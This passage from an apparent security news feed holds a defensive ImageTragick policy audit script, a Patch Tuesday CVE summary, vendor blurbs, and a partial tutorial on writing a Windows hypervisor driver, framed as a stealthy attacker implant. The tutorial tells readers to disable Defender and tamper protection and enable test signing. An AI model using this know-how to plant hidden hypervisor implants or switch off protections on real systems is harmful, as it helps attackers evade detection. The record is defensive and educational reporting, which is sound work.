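}

# Constructed policy fragment (assumed, for illustration) that forgets MSL and PLT.
$samplePolicy = @'
<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="WIN" />
</policymap>
'@

# Constructed ImageTragick-style input: MVG text under a .png name.
$tmp = Join-Path ([System.IO.Path]::GetTempPath()) 'not-really.png'
Set-Content -LiteralPath $tmp -Value "push graphic-context`nviewbox 0 0 640 480`npop graphic-context" -NoNewline
"Magic bytes match claimed type: $(Test-ImageMagic -Path $tmp)"
"Coders still enabled by policy:  $((Test-ImageMagickPolicy -PolicyXml $samplePolicy) -join ', ')"
Remove-Item -LiteralPath $tmp
```

Run as-is, the constructed payload fails the magic-byte check and the sample policy is reported as still allowing MSL and PLT. To audit a real installation, pass the contents of the policy.xml that `convert -list policy` reports as active; on a patched ImageMagick the policy is defense in depth, on an unpatched one it is the only thing standing between an uploaded "image" and a shell.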

Barracuda is proud to announce that it has signed the U.S. Cybersecurity and Infrastructure Security Agency (CISA) Secure by Design Pledge, underlining our commitment to protecting small and medium-sized businesses across all sectors from complex cyberthreats.

by Barracuda

7Critical71Important1Moderate0LowMicrosoft addresses 79 CVEs with seven critical vulnerabilities and four zero-day vulnerabilities, including three that were exploited in the wild.Microsoft patched 79 CVEs in its September 2024 Patch Tuesday release, with seven rated critical, 71 rated as important, and one rated as moderate.This month’s update includes patches for:Azure CycleCloudAzure Network WatcherAzure StackAzure Web AppsDynamics Business CentralMicrosoft AutoUpdate (MAU)Microsoft Dynamics 365 (on-premises)Microsoft Graphics ComponentMicrosoft Management ConsoleMicrosoft Office ExcelMicrosoft Office PublisherMicrosoft Office SharePointMicrosoft Office VisioMicrosoft Outlook for iOSMicrosoft Streaming ServicePower AutomateRole: Windows Hyper-VSQL ServerWindows Admin CenterWindows AllJoyn APIWindows Authentication MethodsWindows DHCP ServerWindows InstallerWindows KerberosWindows Kernel-Mode DriversWindows LibarchiveWindows MSHTML PlatformWindows Mark of the Web (MOTW)Windows Network Address Translation (NAT)Windows Network VirtualizationWindows PowerShellWindows Remote Access Connection ManagerWindows Remote Desktop Licensing ServiceWindows Security Zone MappingWindows Setup and DeploymentWindows Standards-Based Storage Management ServiceWindows StorageWindows TCP/IPWindows UpdateWindows Win32K - GRFXWindows Win32K - ICOMPElevation of privilege (EoP) vulnerabilities accounted for 38% of the vulnerabilities patched this month, followed by remote code execution (RCE) vulnerabilities at 29.1%.CriticalCVE-2024-43491 | Microsoft Windows Update Remote Code Execution VulnerabilityCVE-2024-43491 is a RCE vulnerability in Microsoft Windows Update affecting Optional Components on Windows 10, version 1507 (Windows 10 Enterprise 2015 LTSB and Windows 10 IoT Enterprise 2015 LTSB). 
This was assigned a CVSSv3 score of 9.8, a maximum severity of critical and flagged by Microsoft as exploited in-the-wild.This vulnerability stems from how the Servicing stack handled the applicability of Optional Components as a result of a triggered code defect. This began with a security update released on March 12, 2024 - KB5035858 (OS Build 10240.20526). The affected Optional Components were flagged as “not applicable” and reverted to their Release To Manufacturing (RTM) version. Microsoft notes that only optional components enabled from the following list are affected:.NET Framework 4.6 Advanced Services \ ASP.NET 4.6Active Directory Lightweight Directory ServicesAdministrative ToolsInternet Explorer 11Internet Information Services\World Wide Web ServicesLPD Print ServiceMicrosoft Message Queue (MSMQ) Server CoreMSMQ HTTP SupportMultiPoint ConnectorSMB 1.0/CIFS File Sharing SupportWindows Fax and ScanWindows Media PlayerWork Folders ClientXPS ViewerSuccessful exploitation would result in the rollback of previously mitigated vulnerabilities in the affected optional components in Windows 10 versions as specified above.While this CVE has been labeled as exploited in-the-wild, confusingly Microsoft states that there is no evidence of direct exploitation of CVE-2024-43491,rather through observed rollbacks of CVEs related to Optional Components for Windows 10 (version 1507). Because some of these rolled back CVEs have been observed to have been exploited, this prompted Microsoft to apply the exploitability index assessment for this vulnerability as “Exploitation Detected.”ImportantCVE-2024-38217 | Windows Mark of the Web Security Feature Bypass VulnerabilityCVE-2024-38217 is a security feature bypass vulnerability affecting Mark of the Web, an identifier used by Windows to mark files that have been downloaded from the internet. With a CVSSv3 score of 5.4, Microsoft notes that it was exploited in the wild and publicly disclosed prior to the patch becoming available. 
Successful exploitation of this vulnerability requires an attacker to convince a user into opening a specially crafted file that could evade Mark of the Web (MOTW) defenses.Joe Desimone of Elastic Security published a blog post about the flaw in August, which includes an example of successful exploitation. The blog also highlights that Elastic Security ""identified multiple samples in VirusTotal that exhibit the bug"" with the oldest being submitted ""over 6 years ago,"" indicating potential exploitation as far back as 2018. An additional Mark of the Web security feature bypass vulnerability, CVE-2024-43487, was also patched this month. With a severity rating of moderate and a CVSSv3 score of 6.5, this flaw was rated as “Exploitation Less Likely” according to the Microsoft Exploitability Index. As with CVE-2024-38217, successful exploitation would involve the attacker convincing a user to open a specially crafted file.This is the second month in a row that a MOTW security feature bypass vulnerability was exploited in the wild as a zero-day, as Microsoft published an CVE-2024-38213 in August, though this flaw was originally patched as part of its June 2024 Patch Tuesday.ImportantCVE-2024-38014 | Windows Installer Elevation of Privilege VulnerabilityCVE-2024-38014 is an EoP vulnerability affecting Windows Installer which was observed as being exploited as a zero-day. While Microsoft did not share any details on exploitation, the advisory does note that successful exploitation would grant the attacker SYSTEM level privileges. As with other EoP vulnerabilities, these vulnerabilities are often used as part of post-compromise activity in order to further compromise a network using elevated account privileges.ImportantCVE-2024-38226 | Microsoft Publisher Security Features Bypass VulnerabilityCVE-2024-38226 is a security feature bypass vulnerability affecting Microsoft Publisher. 
This vulnerability was assigned a CVSSv3 score of 7.3 and has been exploited in the wild as a zero-day. In order to exploit this flaw, an attacker must be authenticated to a target system and convince a user to download a crafted file. This would allow a local attacker to bypass Office macro policies designed to block untrusted and potentially malicious files on the target’s system. According to the advisory, the Preview Pane is not an attack vector for this vulnerability.

Important

CVE-2024-26186, CVE-2024-26191, CVE-2024-37335, CVE-2024-37338, CVE-2024-37339 and CVE-2024-37340 | Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability

CVE-2024-26186, CVE-2024-26191, CVE-2024-37335, CVE-2024-37338, CVE-2024-37339 and CVE-2024-37340 are a series of RCE vulnerabilities affecting Microsoft SQL Server Native Scoring. All six of these vulnerabilities are rated as important, were assigned a CVSSv3 score of 8.8, an exploitability index assessment of “Exploitation Less Likely” and were attributed to Andrew Ruddick with Microsoft Security Response Center. Microsoft's FAQ for these vulnerabilities states “successful exploitation of this vulnerability requires an authenticated attacker to leverage SQL Server Native Scoring to apply pre-trained models to their data without moving it out of the database.” While the SQL Server vulnerabilities primarily enable unauthorized data manipulation, they could hypothetically lead to RCE if combined with additional security flaws or misconfigurations that allow SQL command execution.

Important

CVE-2024-37337, CVE-2024-37342 and CVE-2024-37966 | Microsoft SQL Server Native Scoring Information Disclosure Vulnerability

CVE-2024-37337, CVE-2024-37342 and CVE-2024-37966 are information disclosure vulnerabilities affecting Microsoft SQL Server Native Scoring.
All three of these vulnerabilities are rated as important, and were assigned a CVSSv3 score of 7.1 and an exploitability index assessment of “Exploitation Less Likely.” These CVEs are also attributed to Andrew Ruddick with Microsoft Security Response Center, bringing the Microsoft SQL Server Native Scoring CVE count to seven in September’s Patch Tuesday release, accounting for over 10% of the CVEs this month. Successful exploitation of this vulnerability by a threat actor with authenticated access to Microsoft SQL Server Native Scoring could potentially allow the reading of small portions of heap memory. The disclosed memory could contain sensitive data, including user credentials, session tokens, or application-level information, which may lead to further security risks.

Critical

CVE-2024-38018 | Microsoft SharePoint Server Remote Code Execution Vulnerability

CVE-2024-38018 is a critical severity RCE affecting Microsoft SharePoint Server with a CVSSv3 score of 8.8 and an exploitability index assessment of “Exploitation More Likely.” While Microsoft has provided no information on exploitability, a threat actor would generally need to be authenticated and have sufficient permissions for page creation to take advantage of this RCE in Microsoft SharePoint Server.

Tenable Solutions

A list of all the plugins released for Microsoft’s September 2024 Patch Tuesday update can be found here.
As always, we recommend patching systems as soon as possible and regularly scanning your environment to identify those systems yet to be patched. For more specific guidance on best practices for vulnerability assessments, please refer to our blog post on How to Perform Efficient Vulnerability Assessments with Tenable.

Get more information

Microsoft's September 2024 Security Updates
Tenable plugins for Microsoft September 2024 Patch Tuesday Security Updates
Join Tenable's Security Response Team on the Tenable Community.
Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.

by Tenable

Payment gateway provider Slim CD has notified 1.7 million users that their credit card information may have been leaked.

by Malwarebytes Labs

Pingora handles 35M+ requests per second, so saving a few microseconds per request can translate to thousands of dollars saved on computing costs. In this post, we share how we freed up over 500 CPU cores by optimizing one function and announce trie-hard, the open source crate that we created to do it.

by Cloudflare

For modern applications built on Kubernetes and microservices, platform engineering is not just about building functional systems but also about embedding security into the fabric of those systems.

by Dark Reading

Learn how threat actors can exploit SQL Server credential objects to escalate domain privileges and how you can detect it. The post Hijacking SQL Server Credentials using Agent Jobs for Domain Privilege Escalation appeared first on NetSPI.

by NetSPI

A challenging dynamic exists between the CISO and the Board of Directors. While both stakeholders focus on risk management, their... The post Enhancing CISO-Board communication: Three key questions for the CISO to answer appeared first on Sysdig.

by Sysdig

Episode 3: On September 11, 2019, two cybersecurity professionals were arrested in Dallas County, Iowa and forced to spend the night in jail -- just for doing their jobs. Gary De Mercurio and Justin Wynn. Despite the criminal charges against them eventually being dropped, the saga that night five years ago continues to haunt De Mercurio and Wynn personally and professionally. In this episode, the pair and Coalfire's CEO Tom McAndrew share how the arrest and fallout has shaped their lives and careers as well as how it has transformed physical penetration tests for the cybersecurity industry as a whole.

by Dark Reading

Hypervisors are pieces of software used to manage VMs (Virtual Machines) or Guest machines on a Host machine. The main difference between a hypervisor and an emulator is that the former allows the guest machine to execute most instructions on the hardware of the host machine by translating the guest’s instructions into the native machine code of the host - this provides superior performance compared to emulators, especially when it comes to tasks that are computationally intensive.

There are two main types of hypervisors:

Bare-Metal: the software is installed directly on the host hardware, bypassing the host’s operating system (VMWare ESXi, KVM, MS Hyper-V, …). So the execution order is: UEFI / BIOS → Hypervisor → OS executed by the Hypervisor

Hosted: the hypervisor runs as an application on top of a host OS (VirtualBox, VMware Workstation, …). In this case, the execution order is: UEFI / BIOS → Host OS → Hypervisor loaded by the Host OS → Guest OS

As I lately started getting into kernel development, I ran into some posts talking about how it’s possible to develop hypervisor implants - what intrigues me the most is the fact that if an attacker were to establish kernel-level access on a Windows machine with something like a kernel driver, other drivers could abuse the fact that kernel memory is shared to examine the vulnerable driver or rootkit used by the attacker. However, when it comes to hypervisors, once the software itself is loaded into memory and it starts using the virtualization extensions for the CPU it’s built for, it’s virtually possible to hide any memory related to the hypervisor from the Host OS.

This “feature” is, of course, used legitimately by solutions like Credential Guard: a security feature introduced by Microsoft to protect user credentials from theft or compromise - the product works in conjunction with hypervisors to create a secure, isolated environment for storing and processing sensitive authentication data. This is an example of VBS (Virtualization-based security). CG (Credential Guard) leverages hardware-based security features to isolate sensitive data such as “NTLM hashes, TGTs and other kinds of credentials stored applications as domain credentials”. If you want to look at how hypervisor code might look like, I highly suggest looking at SimpleVisor, its entrypoint and the wiki.

Some examples of the before-mentioned articles are:

New Malware Families Found Targeting VMware ESXi Hypervisors
Ransomware operators exploit ESXi hypervisor vulnerability for mass encryption
Protect Your Organization from MosaicRegressor and Other UEFI Implants

The first thing someone might notice is that installing an additional (and malicious) hypervisor on a guest OS that is already running on an underlying hypervisor might not work, as hardware only supports having one hypervisor active. This setup will still be possible as the first hypervisor will extend the support by “emulating” the hardware’s functionality. This means that the first hypervisor has to be able to forward hardware instructions from the CPU to the malicious hypervisor, effectively acting as a middle-man.

With that out of the way we can start implementing a basic driver for Windows: to do that you’ll have to set up your VM by installing the WDK. Then you’ll have to enable Test Signing mode and reboot the machine:

bcdedit /debug on
bcdedit /set testsigning on

Setting up a simple driver

In order to see the debug messages from the driver you will also need to open regedit, navigate to HKLM\SYSTEM\CurrentControlSet\Control\Session Manager and create a new Key called Debug Print Filter. Within that, add a new DWORD Value and give it the name DEFAULT and a value of 8. You might also need to disable MS Defender and anti-tampering mode.
Now you can open Visual Studio and create a new Kernel Mode Driver, Empty (KMDF) and add the following boilerplate code (the macros.h file contains some macros for debug printing and can be found here):

#include <ntddk.h>
#include "macros.h"

void DriverUnload(PDRIVER_OBJECT DriverObject)
{
    UNREFERENCED_PARAMETER(DriverObject);
    SUCCESS("Driver successfully unloaded\n");
}

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
    UNREFERENCED_PARAMETER(RegistryPath);
    DriverObject->DriverUnload = DriverUnload;
    SUCCESS("Driver successfully loaded\n");
    return STATUS_SUCCESS;
}

This simply defines the DriverEntry / DriverUnload functions, which are responsible for loading and unloading the driver from memory, and printing some debugging messages in the process. Now we can create the service for the driver, start it and stop it at will, and we’ll be able to see it load & unload from memory with a tool like DebugView.

sc create hypervisor binPath= C:\Users\otter\Desktop\projects\hypervisor\x64\Debug\hypervisor.sys type= kernel
sc start hypervisor
sc stop hypervisor

Interacting with the CPU

Since we’ll need to talk to the hardware components directly, the code we write will be brand-specific as CPUs of different brands (Intel, AMD, …) have different register structures and instruction sets. In this case, I’m working with an Intel processor so I will be using the official Intel 64 and IA-32 Architectures Software Developer’s Manual.

Before the driver loads into memory, we will need to perform some checks to enumerate the state of Intel’s Virtualization Technology, or Intel VT-x, component. VT-x is a fundamental component for any hypervisor as it allows the software to use CPU extensions for virtualization purposes, so we need to check whether the feature is enabled on the CPU. In our case, we’ll focus on VMX, the Virtual Machine Monitor Extension: a specific implementation of VT-x that provides the tools and mechanisms for hypervisors to create and manage virtual machines.

Part of these properties can also be enumerated with commands like systeminfo, but if you run it on a VM you’ll only get a message along the lines of:

systeminfo
...
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Looking at page 3925 of the manual we’ll find the Discovering Support for VMX section:

“Before system software enters into VMX operation, it must discover the presence of VMX support in the processor. System software can determine whether a processor supports VMX operation using CPUID. If CPUID.1:ECX.VMX[bit 5] = 1, then VMX operation is supported.”

So it’s possible for us to enumerate the VMX state by issuing a CPUID instruction to the CPU and checking the 5th bit of the result found in the ECX register: if the bit is 1 then VMX is enabled, otherwise the feature is disabled.

What does the CPUID instruction do? Heading to page 803 we find the CPUID - CPU Identification section where the CPUID instruction is described as “Returns processor identification and feature information to the EAX, EBX, ECX, and EDX registers, as determined by input entered in EAX (in some cases, ECX as well).” Looking at the implementation of the instruction we see that if EAX contains 0x1 when the instruction is called, ECX will contain the VMX-related information at bit 5, just like the first paragraph mentioned (shocker, I know).

Setting up the driver for virtualization

Now we can implement this instruction in our driver, call it, and check that the 5th bit of the ECX register is set to 1. The following is the complete code with the instruction implementation and the check for VMX.
#include <ntddk.h>
#include <intrin.h>
#include "macros.h"

/*
this function is a helper for the CPUID instruction using the __cpuid intrinsic function
@note originally, the return registers are stored in a 4-element array, but we are only
      interested in the EBX, ECX, and EDX registers so we'll use pointers to store the values
@param UINT32 eax: the value to be passed to the EAX register
@param UINT32* ebx: the value returned by the CPUID instruction in the EBX register
@param UINT32* ecx: the value returned by the CPUID instruction in the ECX register
@param UINT32* edx: the value returned by the CPUID instruction in the EDX register
@reference https://learn.microsoft.com/en-us/cpp/intrinsics/cpuid-cpuidex?view=msvc-170
*/
void cpuid(UINT32 eax, UINT32* ebx, UINT32* ecx, UINT32* edx)
{
    int cpuInfo[4];
    __cpuid(cpuInfo, eax);
    *ebx = cpuInfo[1];
    *ecx = cpuInfo[2];
    *edx = cpuInfo[3];
}

/*
this function checks if the fifth bit of the ECX register is 1 to enumerate whether VMX is supported by the CPU
@param UINT32 eax: the value to be passed to the EAX register
@return BOOLEAN: TRUE if the fifth bit of the ECX register is 1, FALSE otherwise
*/
BOOLEAN checkFifthBit(UINT32 eax)
{
    UINT32 ebx, ecx, edx;
    cpuid(eax, &ebx, &ecx, &edx);
    return (ecx & 0x20) != 0;
}

void DriverUnload(PDRIVER_OBJECT DriverObject)
{
    UNREFERENCED_PARAMETER(DriverObject);
    SUCCESS("Driver successfully unloaded\n");
}

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
    UNREFERENCED_PARAMETER(RegistryPath);
    DriverObject->DriverUnload = DriverUnload;
    SUCCESS("Driver successfully loaded\n");

    // verify whether the CPU supports VMX
    // by checking the fifth bit of the ECX register
    // after the CPUID instruction is executed with EAX = 0x1
    if (checkFifthBit(0x1)) {
        SUCCESS("VMX is supported by the target CPU\n");
    } else {
        ERROR("VMX is not supported by the target CPU\n");
        return STATUS_FAILED_DRIVER_ENTRY;
    }

    return STATUS_SUCCESS;
}

Mind the @note line in the comment for the cpuid wrapper function: for most, if not all, of the functionalities we will implement there is a more “official” way of handling things by declaring a type for each register and describing its structure and the purpose of each bit, like so:

typedef union _IA32_FEATURE_CONTROL_MSR
{
    ULONG64 All;
    struct
    {
        ULONG64 Lock : 1;
        ULONG64 EnableSMX : 1;
        ULONG64 EnableVmxon : 1;
        ULONG64 Reserved2 : 5;
        ULONG64 EnableLocalSENTER : 7;
        ULONG64 EnableGlobalSENTER : 1;
        ULONG64 Reserved3a : 16;
        ULONG64 Reserved3b : 32;
    } Fields;
} IA32_FEATURE_CONTROL_MSR, *PIA32_FEATURE_CONTROL_MSR;

typedef struct _CPUID
{
    int eax;
    int ebx;
    int ecx;
    int edx;
} CPUID, *PCPUID;

So if you’re following along you might want to look into implementing these types and structures.

As you can see from the debug prints and the code, I made it so the driver won’t load properly if VMX is not supported, as it would make no sense going through with the driver entry function when the CPU we’re targeting cannot be exploited. In this case, my VM didn’t have virtualization enabled so the check “fails successfully”. I’m using VirtualBox, so to enable it go to Settings > System > Enable Nested VT-x/AMD-V. If the option is grayed out, turn off the VM and execute VBoxManage modifyvm <vm_name> --nested-hw-virt on; this should select the box and allow for nested virtualization.

Another basic check we could run consists in running CPUID with EAX set to 0x0; this allows us to verify whether the CPU we’re attacking is an Intel CPU. If it is, the values in the EBX, EDX and ECX registers (in that order) should spell the string GenuineIntel if decoded from hex and read in little-endian format; this is known as the “manufacturer string”.
This is the code to implement it:

/*
check whether we're working with an Intel CPU by calling the CPUID instruction with EAX = 0x0
and checking the EBX, ECX, and EDX registers for the manufacturer string
@note the multi-character constants below are MSVC-specific: 'uneG' packs to 0x756E6547,
      which is what EBX holds for "Genu" in little-endian order
@return BOOLEAN: TRUE if the CPU is an Intel CPU, FALSE otherwise
*/
BOOLEAN isIntelCPU()
{
    UINT32 ebx, ecx, edx;
    cpuid(0x0, &ebx, &ecx, &edx);
    return ebx == 'uneG' && edx == 'Ieni' && ecx == 'letn';
}

So we can add a simple if / else check in the DriverEntry function just like we did with the VMX check and we should get something along these lines.

Now we are sure that we are working on an Intel CPU and VMX is supported, so we are free to start setting up the structure for VM control: as the manual states, the hypervisor can enter VMX operation only by setting the 13th bit of the CR4 register to 1 (CR4.VMXE[bit 13] = 1); after this is set the system enters VMX operation by executing the VMXON instruction. VMXON is also controlled by the IA32_FEATURE_CONTROL MSR (MSR address 3AH). This MSR is cleared to zero when a logical processor is reset. The relevant bits of the MSR are:

“Bit 0 is the lock bit. If this bit is clear, VMXON causes a general-protection exception. If the lock bit is set, WRMSR to this MSR causes a general-protection exception; the MSR cannot be modified until a power-up reset condition. System BIOS can use this bit to provide a setup option for BIOS to disable support for VMX. To enable VMX support in a platform, BIOS must set bit 1, bit 2, or both (see below), as well as the lock bit.

Bit 1 enables VMXON in SMX operation. If this bit is clear, execution of VMXON in SMX operation causes a general-protection exception. Attempts to set this bit on logical processors that do not support both VMX operation and SMX operation cause general-protection exceptions.

Bit 2 enables VMXON outside SMX operation. If this bit is clear, execution of VMXON outside SMX operation causes a general-protection exception. Attempts to set this bit on logical processors that do not support VMX operation cause general-protection exceptions.”

Since it’s not the BIOS setting bits in the register, we’ll have to set the lock bit and then bit 1, bit 2, or both. In this specific case we’ll be operating outside SMX, so we only need to set the lock bit and bit 2. So to move on we’ll need some functions to read and write values from an MSR register; thankfully we can use the intrinsic functions to write a quick (and somewhat useless) wrapper:

/*
read the value from a MSR register
@param UINT32 msr: the MSR register to be read
@return UINT64: the value stored in the MSR register
@reference https://learn.microsoft.com/en-us/cpp/intrinsics/readmsr?view=msvc-170
*/
UINT64 readMSR(UINT32 msr)
{
    return __readmsr(msr);
}

/*
write a value to a MSR register
@param UINT32 msr: the MSR register to be written to
@param UINT64 value: the value to be written to the MSR register
@reference https://learn.microsoft.com/en-us/cpp/intrinsics/writemsr?view=msvc-170
*/
void writeMSR(UINT32 msr, UINT64 value)
{
    __writemsr(msr, value);
}

Now that we have the helper functions we can run the checks we need:

#define IA32_FEATURE_CONTROL 0x3A

...

/*
check if the lock bit is set in the IA32_FEATURE_CONTROL MSR register
@return BOOLEAN: TRUE if the lock bit is set, FALSE otherwise
*/
BOOLEAN isLockBitSet()
{
    UINT64 featureControl = readMSR(IA32_FEATURE_CONTROL);
    return (featureControl & 0x1) != 0;
}

/*
check if the VMXON outside SMX bit (bit 2) is set in the IA32_FEATURE_CONTROL MSR register
@return BOOLEAN: TRUE if the VMXON outside SMX bit is set, FALSE otherwise
*/
BOOLEAN isVmxonEnabledOutsideSMX()
{
    UINT64 featureControl = readMSR(IA32_FEATURE_CONTROL);
    return (featureControl & 0x4) != 0;
}

Another step we need to take to prepare for the VMXON instruction is allocating what’s known as a VMXON Region: a 4K-byte aligned memory area used by the CPU to support VMX operation.
“Before executing VMXON, software allocates a region of memory (called the VMXON region) that the logical processor uses to support VMX operation. The physical address of this region (the VMXON pointer) is provided in an operand to VMXON. The VMXON pointer is subject to the limitations that apply to VMCS pointers: The VMXON pointer must be 4-KByte aligned (bits 11:0 must be zero). The VMXON pointer must not set any bits beyond the processor’s physical-address width. Before executing VMXON, software should write the VMCS revision identifier to the VMXON region. (Specifically, it should write the 31-bit VMCS revision identifier to bits 30:0 of the first 4 bytes of the VMXON region; bit 31 should be cleared to 0.) It need not initialize the VMXON region in any other way. Software should use a separate region for each logical processor and should not access or modify the VMXON region of a logical processor between execution of VMXON and VMXOFF on that logical processor. Doing otherwise may lead to unpredictable behavior.”

This process seems incredibly tedious to do in C; thankfully we can use some of the intrinsic functions the Windows API provides for the VMXON instruction (using __vmx_on()). The VMXON region should be zeroed prior to executing VMXON, and the VMCS revision identifier written into the VMXON region at the appropriate offset.

VMXON region layout:

Byte Offset    Contents
0              Bits 31:0: VMCS revision identifier
4              VMXON data

VMCS region layout:

Byte Offset    Contents
0              Bits 30:0: VMCS revision identifier
4              VMX-abort indicator
8              VMCS data

For simplicity’s sake, we’ll only be allocating a single VMXON region, and the respective VMCS region, for only one CPU core. In order to keep track of where the regions are I made a simple structure that represents the state of an individual Virtual Machine by storing the pointers for both the VMXON and VMCS regions.
typedef struct VM_STATE
{
    UINT64 vmxonRegion;
    UINT64 vmcsRegion;
} VM_STATE, *PVM_STATE;

// global value for the VM state
VM_STATE guestVmState;

This is the allocateVmxonRegion function I made to allocate the VMXON region as a contiguous 4K-byte aligned memory region.

#define IA32_FEATURE_CONTROL 0x3A
#define IA32_VMX_BASIC 0x480
#define VMXON_REGION_SIZE 0x1000
#define VMCS_REGION_SIZE 0x1000
#define ALIGNMENT 0x1000

typedef struct VM_STATE
{
    UINT64 vmxonRegion;
    UINT64 vmcsRegion;
} VM_STATE, *PVM_STATE;

typedef union _IA32_VMX_BASIC_MSR
{
    ULONG64 All;
    struct
    {
        ULONG32 RevisionIdentifier : 31;
        ULONG32 Reserved1 : 1;
        ULONG32 RegionSize : 12;
        ULONG32 RegionClear : 1;
        ULONG32 Reserved2 : 3;
        ULONG32 SupportedIA64 : 1;
        ULONG32 SupportedDualMoniter : 1;
        ULONG32 MemoryType : 4;
        ULONG32 VmExitReport : 1;
        ULONG32 VmxCapabilityHint : 1;
        ULONG32 Reserved3 : 8;
    } Fields;
} IA32_VMX_BASIC_MSR, *PIA32_VMX_BASIC_MSR;

...

/*
returns the physical address of a virtual address
@param UINT64 virtualAddress: the virtual address to be converted to a physical address
@return UINT64: the physical address of the virtual address
@reference https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-mmgetphysicaladdress
*/
UINT64 getPhysicalAddress(UINT64 virtualAddress)
{
    PHYSICAL_ADDRESS physicalAddress = MmGetPhysicalAddress((PVOID)virtualAddress);
    return physicalAddress.QuadPart;
}

/*
allocate and load the VMXON region using the __vmx_on intrinsic function
@param VM_STATE* vmState: the VM state of the guest
@return BOOLEAN: TRUE if the VMXON region is successfully allocated, FALSE otherwise
*/
BOOLEAN allocateVmxonRegion(IN VM_STATE* vmState)
{
    // MmAllocateContiguousMemory must be called at IRQL <= DISPATCH_LEVEL;
    // an IRQL that is already higher cannot be "raised" to DPC level, so bail out instead
    if (KeGetCurrentIrql() > DISPATCH_LEVEL) {
        ERROR("IRQL too high to allocate the VMXON region\n");
        return FALSE;
    }

    PHYSICAL_ADDRESS maxPhysicalAddress = { 0 };
    maxPhysicalAddress.QuadPart = MAXULONG64;

    // use MmAllocateContiguousMemory to allocate a contiguous region of memory
    // for the VMXON instruction, leaving room to align it to a 4KB boundary
    SIZE_T sizeOfVmxonRegion = 2 * VMXON_REGION_SIZE;
    PVOID vmxRegionBuffer = MmAllocateContiguousMemory(sizeOfVmxonRegion + ALIGNMENT, maxPhysicalAddress);
    if (vmxRegionBuffer == NULL) {
        ERROR("Failed to allocate the VMXON region\n");
        return FALSE;
    }

    UINT64 physicalAddress = getPhysicalAddress((UINT64)vmxRegionBuffer);
    if (physicalAddress == 0) {
        ERROR("Failed to get the physical address of the VMXON region\n");
        MmFreeContiguousMemory(vmxRegionBuffer);
        return FALSE;
    }

    // zero out the allocated region
    RtlSecureZeroMemory(vmxRegionBuffer, sizeOfVmxonRegion + ALIGNMENT);

    // align the VMXON region to a 4KB boundary
    UINT64 alignedPhysicalBuffer = (physicalAddress + ALIGNMENT - 1) & ~(UINT64)(ALIGNMENT - 1);
    UINT64 alignedVirtualBuffer = ((UINT64)vmxRegionBuffer + ALIGNMENT - 1) & ~(UINT64)(ALIGNMENT - 1);
    INFO("Allocated VMXON region with an aligned virtual buffer from %llx\n", alignedVirtualBuffer);

    // read the IA32_VMX_BASIC MSR and write the 31-bit revision identifier
    // into bits 30:0 of the first 4 bytes of the region (bit 31 stays 0)
    IA32_VMX_BASIC_MSR vmxBasicMsr;
    vmxBasicMsr.All = readMSR(IA32_VMX_BASIC);
    *(UINT32*)alignedVirtualBuffer = vmxBasicMsr.Fields.RevisionIdentifier;

    // VMXON faults unless CR4.VMXE (bit 13) is set first
    __writecr4(__readcr4() | (1ULL << 13));

    // enter VMX operation using the __vmx_on intrinsic function
    unsigned char returnValue = __vmx_on(&alignedPhysicalBuffer);
    if (returnValue) {
        ERROR("Failed to load the VMXON region\n");
        MmFreeContiguousMemory(vmxRegionBuffer);
        return FALSE;
    }

    // update the VM state with the VMXON region
    vmState->vmxonRegion = alignedPhysicalBuffer;
    return TRUE;
}

I used MmAllocateContiguousMemory to allocate the contiguous and non-paged physical memory for the region for two main reasons:

We don’t have to pick a cache type for the allocated memory
The starting address of the allocated buffer is aligned by default to a memory page boundary

After we call MmAllocateContiguousMemory, the VMXON region is completely uninitialized, so we have to zero it using a macro like RtlSecureZeroMemory. The next part of the function addresses the revision identifier (“Before executing VMXON, software should write the VMCS revision identifier to the VMXON region.”) by reading the identifier from the IA32_VMX_BASIC_MSR register and writing it into the VMXON region. Now we’re ready to call __vmx_on and check its result: if it’s 0, the operation succeeded and we can update the vmxonRegion pointer in the VM_STATE structure we defined earlier.

The last thing we will do in this post is allocating and initializing the VMCS region to complete the VM_STATE setup. The responsible code will be pretty much the same, as the requirements are shared between the two memory regions; the only difference is that we’ll be replacing the __vmx_on() function with the __vmx_vmptrld() intrinsic function, which “Loads the pointer to the current virtual-machine control structure (VMCS) from the specified address”, preceded by __vmx_vmclear(), which puts the freshly allocated VMCS into the clear launch state that VMPTRLD and a later VMLAUNCH expect.

/*
allocate, clear and load the VMCS region using the __vmx_vmclear and __vmx_vmptrld intrinsic functions
@param VM_STATE* vmState: the VM state of the guest
@return BOOLEAN: TRUE if the VMCS region is successfully allocated, FALSE otherwise
@reference https://learn.microsoft.com/en-us/cpp/intrinsics/vmx-vmptrld?view=msvc-170
*/
BOOLEAN allocateVmcsRegion(IN VM_STATE* vmState)
{
    // MmAllocateContiguousMemory must be called at IRQL <= DISPATCH_LEVEL
    if (KeGetCurrentIrql() > DISPATCH_LEVEL) {
        ERROR("IRQL too high to allocate the VMCS region\n");
        return FALSE;
    }

    PHYSICAL_ADDRESS maxPhysicalAddress = { 0 };
    maxPhysicalAddress.QuadPart = MAXULONG64;

    // use MmAllocateContiguousMemory to allocate a contiguous region of memory
    // for the VMCS, leaving room to align it to a 4KB boundary
    SIZE_T sizeOfVmcsRegion = 2 * VMCS_REGION_SIZE;
    PVOID vmcsRegionBuffer = MmAllocateContiguousMemory(sizeOfVmcsRegion + ALIGNMENT, maxPhysicalAddress);
    if (vmcsRegionBuffer == NULL) {
        ERROR("Failed to allocate the VMCS region\n");
        return FALSE;
    }

    UINT64 physicalAddress = getPhysicalAddress((UINT64)vmcsRegionBuffer);
    if (physicalAddress == 0) {
        ERROR("Failed to get the physical address of the VMCS region\n");
        MmFreeContiguousMemory(vmcsRegionBuffer);
        return FALSE;
    }

    // zero out the allocated region
    RtlSecureZeroMemory(vmcsRegionBuffer, sizeOfVmcsRegion + ALIGNMENT);

    // align the VMCS region to a 4KB boundary
